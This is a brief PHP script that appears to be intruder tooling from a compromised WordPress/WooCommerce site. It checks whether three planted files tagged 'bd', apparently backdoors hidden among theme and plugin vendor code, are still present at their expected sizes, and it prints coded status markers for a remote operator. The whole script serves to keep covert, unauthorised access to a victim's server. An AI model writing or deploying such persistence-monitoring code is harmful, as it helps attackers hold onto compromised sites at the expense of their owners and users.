<?php $r = '/home/ramtczxy/exoticcockatoos.com'; $x = ["/comp.php"=>"bd@@245633546@@1137",
"/wp-content/themes/flatsome/inc/admin/options/pages/meta/meta.box.framework.php"=>"bd@@246107984@@689",
"/wp-content/plugins/woocommerce/vendor/automattic/jetpack-assets/Call.php"=>"bd@@245749328@@687"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');